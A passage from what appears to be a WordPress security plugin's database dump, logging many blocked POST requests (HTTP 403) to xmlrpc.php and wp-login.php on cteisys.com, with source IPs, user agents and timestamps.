Safari\\/537.36\"}','iYWAZF9lE2M60sH3gbyr5eUo',0,1664023901.0877,1318,'','POST',403,0,600,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WnqQISEemKjFrA2XskMYBoOH',0,1664024038.9229,1306,'','POST',403,0,515,0,1,'',0),('213.152.161.35',3583549731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eEInh8fOaWxPsqF2GNCMvSV1',0,1664024253.0559,1918,'','POST',403,0,515,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9lqPgIu0z3LZTMCScxDEVwFm',0,1664024398.0075,1397,'','POST',403,0,515,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FlHpiGLK1vxaStXo6hJjrquP',0,1664025339.5509,19588,'','POST',403,0,515,0,1,'',0),('213.152.161.118',3583549814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kZQWtwLNHzoJdnmlpa62A3FR',0,1664025412.4685,1240,'','POST',403,0,515,0,1,'',0),('173.236.169.240',2917968368,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','niPAcWJSqYUgTrZw9aIVQo4t',0,1664025973.0689,16776,'','POST',403,0,600,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dwHtM7sfqTv3PScDexjbXIRU',0,1664026799.7067,2282,'','POST',403,0,515,0,1,'',0),('164.46.122.50',2754509362,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','INMSOn9iZDtjF2mrH3XQKWw6',0,1664027024.6790,1438,'','POST',403,0,600,0,1,'',0),('47.106.201.134',795527558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','461vUIp3kzPlMwZsBfoXA8te',0,1664027181.5901,1436,'','POST',403,0,515,0,1,'',0),('185.2.5.31',3103917343,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','T7w4nCkiONGuEqaKPt5gcWm1',0,1664028070.8435,6406,'','POST',403,0,600,0,1,'',0),('149.129.181.108',2508305772,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z3QrtRCXY7pgsq2nfTcJhLDw',0,1664028148.9407,2083,'','POST',403,0,515,0,1,'',0),('198.98.49.240',3328324080,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','H1VlPtkswYQdNA8T7zI3yUnq',0,1664028427.4579,1302,'','POST',403,0,600,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LPI3F4akpOMW2rSXeQiyRCHl',0,1664028693.7786,2304,'','POST',403,0,515,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','gnTyvuoJYEbehfRs4cGUVzdA',0,1664029120.5336,1418,'','POST',403,0,600,0,1,'',0),('34.64.218.102',574675558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dwRfmX1eh6ktC3pruNSHxgUZ',0,1664030028.9565,17269,'','POST',403,0,515,0,1,'',0),('120.27.133.69',2015069509,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','8JBhzqvcieoOQsVl4A1nDgdC',0,1664030145.3308,1194,'','POST',403,0,600,0,1,'',0),('82.102.27.195',1382423491,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','28VKIExqLao7eTMOdsPucYtN',0,1664030148.2471,584,'','POST',403,0,515,0,1,'',0),('116.68.196.90',1950663770,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2RGeIwfYAqBE3pshrmtDjkcu',0,1664030579.4400,1739,'','POST',403,0,515,0,1,'',0),('165.22.202.244',2769734388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','coWQSYBqFZdELl23zOa18kAe',0,1664030598.2193,471,'','POST',403,0,600,0,1,'',0),('165.22.202.244',2769734388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','wZfO9pVDELmo0vUs4ayTRINe',0,1664030599.4720,448,'','POST',403,0,600,0,1,'',0),('212.38.40.215',3559270615,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ia5Fu8mIVv0EAgjBCMRW6s2d',0,1664030983.8967,5320,'','POST',403,0,515,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','01JRKHjoaTcv5piSYEZtCrXg',0,1664031194.8421,1365,'','POST',403,0,600,0,1,'',0),('213.152.161.229',3583549925,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2rAyPWUo04L8veQFVg57YRju',0,1664031410.8570,1347,'','POST',403,0,515,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vT6s5lKbS3wVB8YOW1CuHtf9',0,1664031514.8961,1327,'','POST',403,0,515,0,1,'',0),('103.111.30.40',1735335464,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z8AepmFozBhfuYTbvlGJ1xU4',0,1664031914.5317,1685,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','NMkX2fRQWz4KejlqPaUJ1mIh',0,1664032242.2662,8654,'','POST',403,0,600,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NnTb2Jef6EiBIGS3a4YRcDOK',0,1664032852.2873,1349,'','POST',403,0,515,0,1,'',0),('47.107.242.103',795603559,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','dlrgA16wIKPhTZGY5Uk3tsoD',0,1664033289.7965,1202,'','POST',403,0,600,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HE4BAUVDRgFla3WSnoCTujiM',0,1664033423.8756,1815,'','POST',403,0,515,0,1,'',0),('131.72.236.73',2202594377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zaVyFSthBiQcTLCOPgkuXpN0',0,1664033817.1019,1442,'','POST',403,0,515,0,1,'',0),('193.37.254.19',3240492563,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','O7VkMoKd5G3HLFtIlXZmvqPD',0,1664033915.2820,1195,'','POST',403,0,515,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','tRhkyB5iu0j3KPCrwWdfEMve',0,1664034334.4463,18848,'','POST',403,0,600,0,1,'',0),('97.79.239.127',1632628607,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','itjSH9lcKhkBsWVbDNO1CUJY',0,1664034377.7284,1784,'','POST',403,0,515,0,1,'',0),('213.152.161.40',3583549736,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dFaTbinerq2MoU5LE137HABc',0,1664034536.1537,1254,'','POST',403,0,515,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hit95AenGP2c8Z1KTumDRJ3r',0,1664034751.8330,1291,'','POST',403,0,515,0,1,'',0),('125.227.29.249',2112036345,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VdeQRj2BaknI4LOJSyH7uG3K',0,1664035316.7174,1264,'','POST',403,0,515,0,1,'',0),('159.89.199.237',2673461229,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','fOmYrc9pNX58GJyat7sS0nHW',0,1664035383.3418,1195,'','POST',403,0,600,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YldvP2iRp5oyWEL97HNwcrmU',0,1664035964.8523,18397,'','POST',403,0,515,0,1,'',0),('111.230.202.147',1877396115,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','L9y7Qeh8H0RWlVMO6NvnjzqY',0,1664036439.6453,17320,'','POST',403,0,600,0,1,'',0),('185.46.121.66',3106830658,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cfdAWqEseN3vB9VTORoruwZY',0,1664036908.7049,2445,'','POST',403,0,515,0,1,'',0),('103.35.64.73',1730363465,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AYyVb0xiMkRCfJqZTsj7P9FX',0,1664037285.1686,1296,'','POST',403,0,515,0,1,'',0),('45.120.69.121',762856825,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','bQnjXI7ef2LMPrkCBNz9DpE6',0,1664037490.2855,1487,'','POST',403,0,600,0,1,'',0),('185.189.112.27',3116199963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rScEQtsBXDpmLl9jqYAd576z',0,1664037550.2890,1256,'','POST',403,0,515,0,1,'',0),('188.166.61.228',3165011428,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','q0Fsr81HTBzcQRGEundXMZ7b',0,1664037918.4545,2159,'','POST',403,0,600,0,1,'',0),('154.0.165.146',2583733650,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Eq6N8JRk5CuKmXcQhlnaLgoD',0,1664038157.6135,1210,'','POST',403,0,515,0,1,'',0),('213.152.161.165',3583549861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OfVtdbg2hr1oGDzaZc6IP84w',0,1664038295.8993,18587,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VXrA9aPlQxRsmZgHT68wjOY3',0,1664038563.6802,1419,'','POST',403,0,515,0,1,'',0),('77.65.213.168',1296160168,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ghyIdfr48WYHcq2E7wnXk9AG',0,1664038734.2364,1283,'','POST',403,0,600,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6UIK4z5eHFSmXJ1dac7DnyV3',0,1664038825.4997,1561,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MxljAXUiWdT95yvkY7mQEHbz',0,1664039192.4437,5413,'','POST',403,0,515,0,1,'',0),('162.241.203.137',2733755273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lygWvoj08p7OHhqZsFct5YfD',0,1664039456.5546,1187,'','POST',403,0,515,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','SjBNfWCOx5pkLZtRe0wrlGdy',0,1664039461.9005,528,'','POST',403,0,600,0,1,'',0),('150.95.109.187',2522836411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fy8xPkQFElrARJeNwctIsnLp',0,1664039776.7506,1395,'','POST',403,0,515,0,1,'',0),('107.175.111.233',1806659561,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','nr5qQZLBMIt2ylm34zaEAu96',0,1664040262.6367,1353,'','POST',403,0,600,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eHs8b0jlW2ZkMQdEgXnJtq57',0,1664040540.2062,1260,'','POST',403,0,515,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1D2tuX50I38bBpw7kUW6H4ar',0,1664040845.2592,1322,'','POST',403,0,515,0,1,'',0),('106.52.120.186',1781823674,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','HZ7jvtEwVMI8xmCLJNPKGAq6',0,1664040989.4172,1426,'','POST',403,0,600,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z3YhsV7Nv5I6lteT0kqnDcP8',0,1664041071.0603,1273,'','POST',403,0,515,0,1,'',0),('92.205.110.137',1556967049,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','e4dV5tGLjau0iSPoBCJzx8FY',0,1664041368.5733,18169,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VF36xUfkeBpIl7uLn1AzwC8Y',0,1664041585.1970,1200,'','POST',403,0,515,0,1,'',0),('188.166.236.35',3165056035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','jOWrSdlhvw3Gk4pJegst82co',0,1664041802.8574,1781,'','POST',403,0,600,0,1,'',0),('83.143.116.3',1401910275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AmE73l8KO9VkW0oPZ1vfFhGc',0,1664042064.0834,1240,'','POST',403,0,515,0,1,'',0),('159.203.31.171',2680889259,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aJqGstQkFzDTlEv3R6jO9i5y',0,1664042351.5211,1296,'','POST',403,0,515,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.74.9 (KHTML, like Gecko) Version\\/7.0.2 Safari\\/537.74.9\"}','4pH0hYW1FibX5829saCkDtZ7',0,1664042477.3088,1127,'','POST',403,0,600,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','XAmZeUiV4r7wIPlLpuRGWjbv',0,1664042522.8369,1261,'','POST',403,0,600,0,1,'',0),('101.43.127.191',1697349567,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d48IGejwQPDlHVXYzgWknpK0',0,1664042539.5531,586,'','POST',403,0,515,0,1,'',0),('51.178.136.33',867338273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SQkNbG8KlrsUYRCPMFDh3ZAg',0,1664042827.9545,2004,'','POST',403,0,515,0,1,'',0),('81.88.52.223',1364735199,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5iRq0zN7aVQHwX9CSWDcxmd2',0,1664043026.9271,1795,'','POST',403,0,515,0,1,'',0),('144.126.223.177',2424233905,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','2Us9Z7oJzKRe5cxqL14AQtGB',0,1664043315.8031,1595,'','POST',403,0,600,0,1,'',0),('163.172.110.175',2745986735,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IZmCG9FRkHdVvbgzAj20WXre',0,1664043513.2545,1493,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Pa7A2U0IsjRJoOCtcBrdEGYL',0,1664043794.7209,1269,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VxXOQoeIdPw4KHUpfu09rcvF',0,1664044004.8208,1235,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','PzkADEFbwOaJqH47h3XM95BN',0,1664044023.2870,1262,'','POST',403,0,600,0,1,'',0),('120.79.8.125',2018445437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RiES2f5ncGI8yKJ1F69xAle4',0,1664044265.9546,1548,'','POST',403,0,515,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MOxKw7aiGmWPLHsBdpXC20tS',0,1664044459.0449,8178,'','POST',403,0,515,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','PAX56vOKQJIH0RSimfzBGWYN',0,1664044806.0718,1329,'','POST',403,0,600,0,1,'',0),('107.180.247.212',1807022036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2sThbMrAQf91NZVqutkBxI4y',0,1664045216.8783,1219,'','POST',403,0,515,0,1,'',0),('103.153.214.231',1738135271,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7TBhfNGA5L2gzH4CUsQXwVE9',0,1664045394.4501,1221,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','NeBSMQV2tbd3RAX8T6rgy74O',0,1664045498.9840,1257,'','POST',403,0,600,0,1,'',0),('198.57.247.254',3325687806,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JtpioYeZKTN5zVglBEQby4CG',0,1664045699.2444,1315,'','POST',403,0,515,0,1,'',0),('161.97.100.231',2707514599,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DIJ1sLHxSKNbXEVeWYRoMQ7T',0,1664045863.9737,1245,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UcBj39FEwymRC4Vxs0AJ7tf2',0,1664046127.3305,1598,'','POST',403,0,515,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','zuGKfZPAcdxDR67MThBpX2E1',0,1664046271.9736,1296,'','POST',403,0,600,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','e78JuDO4bTrWwERojmcnC6tA',0,1664046783.2440,1458,'','POST',403,0,515,0,1,'',0),('138.128.173.10',2323688714,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tIxGbDz8mB2YjFuC4Kp3ec6T',0,1664047050.2962,1368,'','POST',403,0,515,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zHmM6bjULyZqRlh7TntXrdp8',0,1664047262.4819,1371,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nHkc6e90KFGUWuMRytgbhQAX',0,1664047523.2700,1207,'','POST',403,0,515,0,1,'',0),('184.75.221.35',3091979555,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2vTV8KQSpwC6IEOa13oRsWnD',0,1664047706.1237,1333,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 